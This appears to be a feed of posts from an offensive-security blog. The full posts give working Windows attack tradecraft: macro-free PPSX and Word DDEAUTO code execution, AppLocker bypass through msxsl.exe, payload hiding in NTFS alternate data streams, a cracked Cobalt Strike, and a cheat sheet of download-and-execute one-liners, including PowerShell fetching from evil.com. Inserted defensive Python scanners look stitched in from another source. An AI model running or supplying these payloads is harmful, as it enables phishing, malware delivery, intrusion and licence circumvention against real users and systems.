
    Anyone who says OAuth 2.0 has a vulnerability / that the protocol is insecure, stick your head over here, the bricks are ready. Black Hat's talk on Pa […]

  • 11/08/16--00:28: On the 10th printing
    《Web前端黑客技术揭秘》(Web Front-End Hacking Techniques Revealed) went on sale in January 2013 and has now reached its 10th printing; for a security book this is a result that genuinely exceeded our […]

    Seebug Paper previously collected three related articles: Bypassing mixed-content warnings – on a secure page […]

    JSON hijacking techniques on the modern Web http://paper.seebug.org/130/ Those sneaky-style people […]

  • 12/01/16--19:47: [PRE] CSRF attack: Attack on Titan
    I am planning a slide deck devoted to the many tricks in CSRF, beyond the old, well-worn techniques: https://github. […]

    New year, new look. I tested this worm on a small scale, submitted it to the vendor for a fix, and shared it within a small circle; here it is now published openly, for research rather than destruction […]

  • 03/05/17--00:37: A mining worm, uncensored
    Early this morning our honeynet system popped up an interesting string: zaxa2aq@protonmail.com ProtonMa […]

  • 05/18/17--19:39: XSS'OR, an online front-end hacking tool
    This is a free online front-end hacking tool with 3 main modules at present: 1. an Encode/Decode module, which includes: […]

  • 06/20/17--23:41: Building a PPSX phishing file
    A new phishing technique appeared a while ago: a PowerPoint file that runs a program without macros being enabled. FreeBuf covered it in 《新型PPT钓鱼攻击分析》 (Analysis of a new PPT phishing attack) and 《无需宏,PPT也能用来投递恶意程序》 (No macros needed: PPT can deliver malware too), but neither article explains how such a file is made. So this post shares the method, in the hope that people understand it and can defend against it.

    First, create an ordinary PPTX file and put some arbitrary content in it, as shown below:
    (figure: 1.png)

    Then insert an action button; it lives here in the ribbon:
    (figure: 2.png)

    Pick the blank one. After selecting it, drag out a trigger area on the slide; the Action Settings dialog then pops up:
    (figure: 3.png)

    Choose Mouse Over -> Run program:
    (figure: 4.png)

    Arguments can be appended directly after the program to run, the calculator in this case; then click OK.
    (figure: 5.png)
    The button now shows as a coloured region, so it has to be styled: right-click -> Format Shape, and set both the fill and the line colour to none.
    (figure: 6.png)

    Finally, save the file as PPSX.

    Final result:

    (figure: 2.gif)
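    The defensive side of the procedure above is a scanner for the artefact it leaves behind. The Python below is an added example, not code from the original post: it opens a .pptx/.ppsx package and reports every shape whose a:hlinkClick or a:hlinkMouseOver element carries action="ppaction://program", resolving the element's r:id through the slide's .rels part to the external relationship whose Target holds the program path and arguments. The sample package it builds for the demonstration is constructed by hand (a single slide part and its rels) rather than saved by PowerPoint, and the program path in it is an assumption.

```python
"""Find action buttons that launch a program inside a .pptx/.ppsx package.

Added example (not code from the original post). PowerPoint stores the
"Run program" action as an a:hlinkClick or a:hlinkMouseOver element whose
action attribute is ppaction://program; its r:id names an external
relationship in the slide's .rels part, and that relationship's Target is
the program path plus arguments. The sample package built here is
constructed by hand and is far smaller than a real PowerPoint file.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
P_NS = "http://schemas.openxmlformats.org/presentationml/2006/main"
SLIDE_RE = re.compile(r"ppt/slides/slide\d+\.xml")


def slide_rels(zf, names, slide_part):
    """Map r:id -> (Target, TargetMode) from ppt/slides/_rels/slideN.xml.rels."""
    rels_part = slide_part.replace("ppt/slides/", "ppt/slides/_rels/") + ".rels"
    if rels_part not in names:
        return {}
    root = ET.fromstring(zf.read(rels_part))
    return {rel.get("Id"): (rel.get("Target"), rel.get("TargetMode"))
            for rel in root.iter("{%s}Relationship" % REL_NS)}


def find_program_actions(package: bytes):
    """Return [(slide part, trigger element, program target)] for every ppaction://program link."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        names = set(zf.namelist())
        for part in sorted(n for n in names if SLIDE_RE.fullmatch(n)):
            rels = slide_rels(zf, names, part)
            root = ET.fromstring(zf.read(part))
            for trigger in ("hlinkClick", "hlinkMouseOver"):
                for link in root.iter("{%s}%s" % (A_NS, trigger)):
                    if not (link.get("action") or "").startswith("ppaction://program"):
                        continue
                    target, _mode = rels.get(link.get("{%s}id" % R_NS), ("<unresolved r:id>", None))
                    hits.append((part, trigger, target))
    return hits


def build_sample_package(program: str, action: str = "ppaction://program") -> bytes:
    """Construct a minimal package with one shape carrying a mouse-over action (test input only)."""
    slide = (
        '<p:sld xmlns:p="%s" xmlns:a="%s" xmlns:r="%s"><p:cSld><p:spTree>'
        '<p:sp><p:nvSpPr><p:cNvPr id="2" name="Action Button: Custom 1">'
        '<a:hlinkMouseOver r:id="rId2" action="%s"/>'
        '</p:cNvPr></p:nvSpPr></p:sp></p:spTree></p:cSld></p:sld>'
    ) % (P_NS, A_NS, R_NS, action)
    rels = (
        '<Relationships xmlns="%s"><Relationship Id="rId2" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="%s" TargetMode="External"/></Relationships>'
    ) % (REL_NS, escape(program, {'"': "&quot;"}))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/slide1.xml", slide)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # hypothetical program path; a real file would be read with open(path, "rb").read()
    for hit in find_program_actions(build_sample_package("calc.exe /ping 127.0.0.1")):
        print(hit)
```

    Run it against a real file by passing the package bytes to find_program_actions(); an empty list means no shape in any slide will launch a program on click or hover. A jump action such as ppaction://hlinkshowjump is deliberately not reported.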


    XSS'OR is now open source under the BSD licence, which is very permissive: no restrictions on distribution or commercial use, just keep the author's copyright notice. Below […]

  • 07/07/17--00:28: Bypass AppLocker With MSXSL.EXE
    XSLT has already come up in several earlier posts (Hack With XSLT, XXE with XSL, Xsl Exec Webshell); today's share is a way to bypass AppLocker with msxsl.exe.
    msxsl.exe is Microsoft's command-line XSL processor. Because it honours script blocks in the stylesheet, we can run JavaScript (JScript) through it and from there execute system commands. Download: (link)

    msxsl.exe takes two files, an XML document and an XSL stylesheet; the command line is:

    msxsl.exe demo.xml exec.xsl
    

    demo.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
     
    <msxsl:script language="JScript" implements-prefix="user">
       function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
       return nodelist.nextNode().xml;
     
       }
    </msxsl:script>
    <xsl:template match="/">
       <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    (figure: 1.gif)

    Likewise, msxsl.exe can load both files from a remote URL:

    msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl
    
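    The part of the stylesheet that makes this work is the msxsl:script element in the urn:schemas-microsoft-com:xslt namespace, which both msxsl.exe and MSXML execute. The Python below is an added example, not code from the original post: it parses a stylesheet and reports each script block's language, exported prefix and the COM automation calls it contains, and it pulls the href out of an xml-stylesheet processing instruction so a remotely hosted .xsl (the second invocation above) can be spotted before anything runs it. The two stylesheets embedded at the bottom are constructed for the demonstration; the first mirrors the exec.xsl above.

```python
"""Flag msxsl:script blocks in an XSL stylesheet before anything processes it.

Added example (not from the original post). The inspector only reads the XML;
it never runs the transform. COM_CALLS is a hand-picked list of automation
objects worth reporting, not an exhaustive one.
"""
import re
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"
COM_CALLS = ("ActiveXObject", "CreateObject", "GetObject", "WScript.Shell",
             "Shell.Application", "WinHttp.WinHttpRequest", "Scripting.FileSystemObject")
STYLESHEET_PI = re.compile(r"<\?xml-stylesheet\b[^?]*?href\s*=\s*([\"'])(.*?)\1", re.S)


def inspect_stylesheet(xsl_text: str):
    """One dict per msxsl:script block: language, implements-prefix and COM calls seen in its body."""
    root = ET.fromstring(xsl_text)
    findings = []
    for script in root.iter("{%s}script" % MSXSL_NS):
        code = "".join(script.itertext())
        findings.append({
            "language": script.get("language", "JScript"),   # msxsl's documented default
            "prefix": script.get("implements-prefix"),
            "com_calls": sorted(c for c in COM_CALLS if c in code),
        })
    return findings


def stylesheet_href(xml_text: str):
    """href of the xml-stylesheet processing instruction in an XML document, or None."""
    m = STYLESHEET_PI.search(xml_text)
    return m.group(2) if m else None


def is_dangerous(xsl_text: str) -> bool:
    """True when any script block reaches a COM object; a script-free transform stays False."""
    return any(f["com_calls"] for f in inspect_stylesheet(xsl_text))


# Constructed sample inputs: the first mirrors the exec.xsl from the post.
EXEC_XSL = """<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
  function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
    return nodelist.nextNode().xml;
  }
</msxsl:script>
<xsl:template match="/"><xsl:value-of select="user:xml(.)"/></xsl:template>
</xsl:stylesheet>"""

PLAIN_XSL = """<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><xsl:value-of select="//name"/></xsl:template>
</xsl:stylesheet>"""

DEMO_XML = """<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://evi1cg.me/scripts/exec.xsl" ?>
<customers><customer><name>Microsoft</name></customer></customers>"""

if __name__ == "__main__":
    print("stylesheet referenced by demo.xml:", stylesheet_href(DEMO_XML))
    for finding in inspect_stylesheet(EXEC_XSL):
        print(finding)
```

    A stylesheet with no msxsl:script block cannot reach WScript.Shell through msxsl.exe, so an empty findings list is the clean result; the language defaults to JScript when the attribute is omitted, which is why the inspector reports it even then.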

  • 07/24/17--01:59: Downloading a file through IE from PowerShell
    $ie = New-Object -Com internetExplorer.Application
    $ie.Navigate("https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe")
    
    #------------------------------
    #Wait for Download Dialog box to pop up
    Sleep 5
    while($ie.Busy){Sleep 1}
    #------------------------------
    
    #Hit "S" on the keyboard to hit the "Save" button on the download box
    $obj = new-object -com WScript.Shell
    $obj.AppActivate('Internet Explorer')
    $obj.SendKeys('s')
    
    #Hit "Enter" to save the file
    $obj.SendKeys('{Enter}')
    
    #Closes IE Downloads window
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{Enter}')
    
    

    Original: (link)


  • 08/03/17--18:25: Some Tricks
    Another way to execute a remote .sct

    cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    Details: https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd

    Command-line download, method 1

    bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip
    bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\p.zip
    bitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:\p.zip"
    

    Command-line download, method 2

    certutil -urlcache -split -f http://192.168.254.102:80/a.txt b.txt
    

    Clear the cache: certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete

    Run remote JS from the command line

    certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete
    

    Run remote VBS from the command line

    certutil -urlcache -split -f http://192.168.254.102:80/abc a.vbs && cscript a.vbs &&  del a.vbs && certutil -urlcache -split -f http://192.168.254.102:80/abc delete
    

    Run a remote HTA from the command line

    mshta http://192.168.254.102/1.hta
    

  • 08/31/17--19:23: ADS in penetration testing
    For the test, an exe generated with Cobalt Strike is used to check whether the file uploads successfully and runs; after every upload the server deletes the file automatically, as shown below:
    (figure: 1504229593529.png)

    PS: the meterpreter session was obtained through the PowerShell web_delivery module.

    Creating the folder succeeds:
    (figure: 1504229703126.png)

    Upload the file into a special directory:

    upload /tmp/beacon.exe \\\\.\\c:\\WINDOWS\\debug\\WIA\\123:aa.exe
    

    upload /tmp/beacon.exe 123:aa.exe also works; that writes the stream into the current directory.

    After uploading, drop into a shell and check with dir /r:
    (figure: 1504229856372.png)

    The write succeeded. Next, execute it with WMIC:

    wmic process call create \\.\c:\WINDOWS\debug\WIA\123:aa.exe
    wmic process call create C:\WINDOWS\debug\WIA\123:aa.exe //for the current-directory case; an absolute path is required
    

    It can also be run from msf:

    execute -cH -f "\\\\.\\c:\\WINDOWS\\debug\\WIA\\123:aa.exe"
    

    (figure: 1504229982741.png)

    The session shows up in Cobalt Strike.

    With sufficient permissions, certutil can download a file straight into the ADS:

    certutil -urlcache -split -f http://url/test.exe \\.\c:\WINDOWS\debug\WIA\123:aa.exe
    

    Delete the certutil cache

    certutil.exe -urlcache -split -f http://url/test.exe delete
    

    While testing I found something interesting. Using test:
    (figure: 1.gif)

    Using nul
    (figure: test.gif)

    Testing shows that if you want the ADS to stay invisible to dir /s, the usable file names are:

    \\.\C:\test\COM1
    \\.\C:\test\COM2
    ...
    \\.\C:\test\COM9
    \\.\C:\test\nul
    

    These files cannot be deleted directly; to delete them, use:

    del \\.\C:\test\nul
    

    One more thing: how to run an ADS file with arguments. msf can help, with the following command (path and arguments are placeholders):

    execute -iH -f "c:\\<path>\\123:1.exe" -a "<arguments>"
    

    The result:
    (figure: 1504257989079.png)

    To delete an ADS from msf, rm with the absolute path is enough, as shown below:
    (figure: 1504258209654.png)
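    Two checks a defender wants for the tricks above, as an added example that is not part of the original post. First, enumerate the streams on a file or directory with the FindFirstStreamW/FindNextStreamW API that dir /r itself uses, so the hidden 123:aa.exe on a directory shows up as :aa.exe:$DATA. Second, flag path components that are Win32 reserved device names (NUL, CON, PRN, AUX, COM1-COM9, LPT1-LPT9, with or without an extension), which is why the \\.\C:\test\nul variant stays out of dir /s: ordinary tools go through the Win32 path parser, which maps those names to devices, and only the \\.\ or \\?\ prefix bypasses it. The stream enumeration needs Windows (it is skipped elsewhere); the name check is pure Python. The sample paths are the post's own.

```python
"""Enumerate NTFS alternate data streams and flag reserved device names in paths.

Added example, not from the original post. list_streams() wraps the Win32
FindFirstStreamW/FindNextStreamW calls and therefore only works on Windows;
is_reserved_device_name() is portable and explains why `\\.\C:\test\nul`
or `\\.\C:\test\COM1` never appear in `dir /s`.
"""
import sys
import ctypes

RESERVED = ({"CON", "PRN", "AUX", "NUL"}
            | {"COM%d" % i for i in range(1, 10)}
            | {"LPT%d" % i for i in range(1, 10)})


def split_stream(name: str):
    """'123:aa.exe' -> ('123', 'aa.exe'); a plain name -> (name, None).
    Pass a single path component, not a full path, so the drive colon is not mistaken for a stream."""
    base, sep, stream = name.partition(":")
    return base, (stream if sep else None)


def is_reserved_device_name(path: str) -> bool:
    """True if the last component of path is a DOS device name (extension and stream suffix ignored)."""
    name = path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1]
    base, _ = split_stream(name)
    stem = base.split(".", 1)[0].strip().upper()      # 'nul.txt' is reserved as well
    return stem in RESERVED


def list_streams(path: str):
    """Return [(stream_name, size)] for every stream on path; directories have no unnamed ::$DATA."""
    if sys.platform != "win32":
        raise OSError("FindFirstStreamW is only available on Windows")
    from ctypes import wintypes

    class WIN32_FIND_STREAM_DATA(ctypes.Structure):
        _fields_ = [("StreamSize", ctypes.c_longlong),
                    ("cStreamName", ctypes.c_wchar * (260 + 36))]   # MAX_PATH + 36

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.FindFirstStreamW.argtypes = [wintypes.LPCWSTR, ctypes.c_int, ctypes.c_void_p, wintypes.DWORD]
    k32.FindFirstStreamW.restype = wintypes.HANDLE
    k32.FindNextStreamW.argtypes = [wintypes.HANDLE, ctypes.c_void_p]
    k32.FindNextStreamW.restype = wintypes.BOOL
    k32.FindClose.argtypes = [wintypes.HANDLE]

    ERROR_HANDLE_EOF = 38
    invalid = wintypes.HANDLE(-1).value
    data = WIN32_FIND_STREAM_DATA()
    handle = k32.FindFirstStreamW(path, 0, ctypes.byref(data), 0)   # 0 == FindStreamInfoStandard
    if handle == invalid:
        err = ctypes.get_last_error()
        if err == ERROR_HANDLE_EOF:
            return []                                   # e.g. a directory with no named streams
        raise ctypes.WinError(err)
    streams = []
    try:
        while True:
            streams.append((data.cStreamName, data.StreamSize))
            if not k32.FindNextStreamW(handle, ctypes.byref(data)):
                break                                   # ERROR_HANDLE_EOF ends the list
    finally:
        k32.FindClose(handle)
    return streams


def named_streams(path: str):
    """Only the alternate streams, i.e. everything except the unnamed ::$DATA."""
    return [s for s in list_streams(path) if not s[0].startswith("::")]


if __name__ == "__main__":
    for p in (r"\\.\c:\WINDOWS\debug\WIA\123:aa.exe", r"\\.\C:\test\nul", r"C:\test\COM10"):
        print(p, "-> reserved name:", is_reserved_device_name(p))
    if sys.platform == "win32":
        print(named_streams(r"C:\WINDOWS\debug\WIA\123"))   # path from the post; may not exist
```

    Note that COM10 is not reserved, only COM1 to COM9, and that a file created through the \\.\ prefix with a reserved name has to be deleted through that same prefix, exactly as the del \\.\C:\test\nul command above does.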


  • 09/06/17--22:50: Cobalt Strike 3.8 cracked version
    (figure: C568E2BB-3369-4EB1-993A-EBEA12790162.png)
    I had wanted to download 3.8 for a while but could not find it; then a reader left a link to a trial version in the comments (safety unknown).
    (figure: B49E21D6-8C9D-405B-AA10-B0B3B3275F95.png)

    Link: https://f001.backblazeb2.com/file/thedarkcloud/cobaltstrike/cobaltstrike-trial.tgz

    So I downloaded it and found that it is not a cracked version, as shown below:
    (figure: E0C37677-323F-4D1A-A00D-0CC6068D73A1.png)

    So I made some simple modifications and am sharing the method here for everyone's use.
    First, unpack cobaltstrike.jar. Inside, find common\License.class and decompile it with jad.

    C:\Users\evi1cg\Desktop\jad>jad License.class
    Parsing License.class... Generating License.jad
    

    Then edit License.jad and change the following parameter: find life and set it to 65535L:

    (figure: 4E7F56F9-72A6-4038-BAD5-778BC8FAF54C.png)

    Then rename License.jad to License.java, place it in the root of the unpacked Cobalt Strike, and compile it with javac.

    javac -classpath . License.java
    

    Compilation yields License.class. Open the original (still packed) jar with WinRAR and replace the original License.class with the modified one.

    If you do not want the dialog on startup, compile the following License.java instead:

    package common;
    
    import aggressor.Prefs;
    
    public class License
    {
    
        public License()
        {
        }
    
        private static long getTimeSinceStart()
        {
            Prefs prefs = Prefs.getPreferences();
            today = System.currentTimeMillis();
            start = prefs.getLongNumber("cobaltstrike.start.int", 0L);
            if(start == 0L)
            {
                prefs.set("cobaltstrike.start.int", (new StringBuilder()).append("").append(today).append("").toString());
                prefs.save();
                start = today;
            }
            difference = (today - start) / 0x5265c00L;
            return difference;
        }
    
        public static void checkLicenseGUI()
        {
            getTimeSinceStart();
        }
    
        public static boolean isTrial()
        {
            return true;
        }
    
        public static void checkLicenseConsole()
        {
        }
    
        private static long life = 65535L;
        private static long today = 0L;
        private static long start = 0L;
        private static long difference = 0L;
    
    }
    

    There is a pitfall here: cracking by following that other article is problematic, because it simply changes the return value of common.License.isTrial() to false.

    public static boolean isTrial()
      {
        return true;
        // the function that must be modified
        // return false; //edit here
      }
    

    That sends the XorEncode handler in the ArtifactUtils class straight into the payload encoding path.

        public static byte[] XorEncode(byte data[], String arch)
        {
            if(License.isTrial())
            {
                CommonUtils.print_trial((new StringBuilder()).append("Disabled ").append(arch).append(" payload stage encoding.").toString());
                return data;
            }
            AssertUtils.Test(data.length > 16384, "XorEncode used on a stager (or some other small thing)");
            AssertUtils.TestArch(arch);
            if("x86".equals(arch))
            {
                byte decoder[] = CommonUtils.pickOption("resources/xor.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            }
            if("x64".equals(arch))
            {
                byte decoder[] = CommonUtils.readResource("resources/xor64.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            } else
            {
                return new byte[0];
            }
        }
    

    But because the trial version does not ship xor.bin or xor64.bin, that path makes it impossible to create a listener. So we only change the time instead. Our CS is then usable; the drawback is that the payload cannot be encoded.

    (figure: 5CE4860A-6B52-4E1F-A895-48EBFE03657F.png)

    Download link for the modified version: (link), password: 86f3. Verify its safety yourself!!


  • 10/04/17--00:17: WordPress firewall
    I have used this for a long time and recommend it: Wordfence Security. Try the details yourself; let me talk about something else. WordPress […]

  • 10/10/17--19:59: MSWord Code Exec Without Macro
    Today I learned a new way of executing code from Word, again without enabling macros, so here it is. The steps are simple.
    First create a new Word document, then insert a field:

    (figure: 1507690693509.png)

    Select = (Formula)

    (figure: 1507690775534.png)

    Right-click, Toggle Field Codes

    (figure: 1507690814044.png)

    Change the field code to:

    {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }
    

    (figure: 1507690880290.png)

    Then right-click, Update Field, and save the document in docx format. The final result:

    (figure: 2.gif)

    The weak point is that it only executes after the user clicks Yes in the prompt.

    Besides DDEAUTO, plain DDE also works:

    {DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }
    

    Note that with DDE the field does not update on its own; the document has to be edited: rename it to .rar, open it, edit word/settings.xml and add

    <w:updateFields w:val="true"/>
    

    The DDE variant in action:

    (figure: dde.gif)

    Personally I find DDE works better.

    How to get an interactive shell?

    { DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evil.com/evil.ps1');powershell -e $e "}
    
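    The inspection a defender wants for these documents, as an added example that is not code from the original post: Word keeps a field code either in a w:fldSimple element's w:instr attribute or, for complex fields, in w:instrText runs between a w:fldChar begin and the matching separate/end, and the instruction may be split across several runs, so the scanner joins them before matching DDE/DDEAUTO. It also reads word/settings.xml for the w:updateFields switch the post adds for the non-AUTO variant. The sample documents it builds are constructed here, not saved by Word, and the QUOTE-based obfuscations of the field code are out of scope.

```python
"""Scan a .docx package for DDE/DDEAUTO fields and the updateFields setting.

Added example (not from the original post). Every word/*.xml part is scanned,
so a field hidden in a header, footer or footnote part is found too.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
DDE_RE = re.compile(r"^\s*DDE(?:AUTO)?\b", re.IGNORECASE)


def w(tag):
    return "{%s}%s" % (W_NS, tag)


def field_instructions(part_xml: bytes):
    """Every field instruction in a WordprocessingML part, in document order, runs joined."""
    root = ET.fromstring(part_xml)
    out = []
    open_fields = []                     # stack of [collecting?, chunks], one per nested field
    for el in root.iter():
        if el.tag == w("fldSimple"):
            out.append(el.get(w("instr"), ""))
        elif el.tag == w("fldChar"):
            kind = el.get(w("fldCharType"))
            if kind == "begin":
                open_fields.append([True, []])
            elif kind == "separate" and open_fields:
                open_fields[-1][0] = False   # the field result follows; stop collecting
            elif kind == "end" and open_fields:
                out.append("".join(open_fields.pop()[1]))
        elif el.tag == w("instrText") and open_fields and open_fields[-1][0]:
            open_fields[-1][1].append(el.text or "")
    return out


def scan_docx(package: bytes):
    """{'dde_fields': [(part, normalised instruction)], 'update_fields_on_open': bool}"""
    report = {"dde_fields": [], "update_fields_on_open": False}
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")) or "/_rels/" in name:
                continue
            xml = zf.read(name)
            if name == "word/settings.xml":
                flag = ET.fromstring(xml).find(w("updateFields"))
                if flag is not None and flag.get(w("val"), "true").lower() in ("true", "1", "on"):
                    report["update_fields_on_open"] = True
                continue
            for instr in field_instructions(xml):
                norm = " ".join(instr.split())
                if DDE_RE.match(norm):
                    report["dde_fields"].append((name, norm))
    return report


def build_sample_docx(instr_runs, update_fields: bool) -> bytes:
    """Construct a one-paragraph document whose field code is split across the given runs (test data)."""
    runs = "".join('<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % escape(t)
                   for t in instr_runs)
    document = (
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>%s'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>!Unexpected End of Formula</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    ) % (W_NS, runs)
    settings = '<w:settings xmlns:w="%s">%s</w:settings>' % (
        W_NS, '<w:updateFields w:val="true"/>' if update_fields else "")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", document)
        zf.writestr("word/settings.xml", settings)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx([r"DDEAUTO c:\\windows\\system32\\cmd.exe ", r'"/k calc.exe"'], True)
    print(scan_docx(sample))
```

    The "!Unexpected End of Formula" text in the constructed document is the cached field result a Formula field shows before it is updated; it is only there so the separate/end handling is exercised.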

    People often run into a command-execution vulnerability and do not know what to do with it, for example command execution from an MSSQL injection point: how do you turn that into a meterpreter? At that point you have to find a way. I have come across many methods for executing remote commands from the command line, but can never remember them when needed, so here is a summary of the ones I have met; maybe one of them will help you. (We leave out the case where you can simply echo a webshell.)

    1. powershell

    eg:

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
    

    2. regsvr32

    eg:

    regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
    

    js.png

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
                ps  = "cmd.exe /c calc.exe";
                new ActiveXObject("WScript.Shell").Run(ps,0,true);
    
            ]]>
    </script>
    </registration>
    </scriptlet>
    

    3. rundll32

    eg:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
    

    Details: (link)

    4. mshta

    eg:

    mshta http://site.com/calc.hta
    

    calc.hta

    <HTML>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <HEAD>
    <script language="VBScript">
    Window.ReSizeTo 0, 0
    Window.moveTo -2000,-2000
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"
    self.close
    </script>
    <body>
    demo
    </body>
    </HEAD>
    </HTML>
    

    5. pubprn.vbs

    eg:

    cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    6. bitsadmin

    eg:

    cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
    

    7. python (must be installed on the target)

    eg:

    python -c "import urllib2; exec urllib2.urlopen('http://site.com/abc').read();"
    

    abc

    import base64; exec base64.b64decode("...")
    

    8. certutil

    eg:

    certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
    

    9. msiexec

    msiexec /q /i http://site.com/payloads/calc.png
    

    calc.png

    msfvenom -f msi -p windows/exec CMD=calc.exe > calc.png
    

    10. msxsl.exe (must be downloaded to the target)

    eg:

    msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl
    

    demo.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
    
    <msxsl:script language="JScript" implements-prefix="user">
       function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
       return nodelist.nextNode().xml;
    
       }
    </msxsl:script>
    <xsl:template match="/">
       <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    11. IEExec

    eg:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec http://site.com/files/test64.exe
    

    Details: (link)

    12. IEXPLORE.EXE

    This one needs an IE vulnerability that gives command execution.
    eg:

    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp
    

    The exploit can be something like ms14_064.

    There are surely many more methods; leave a comment to add yours!!
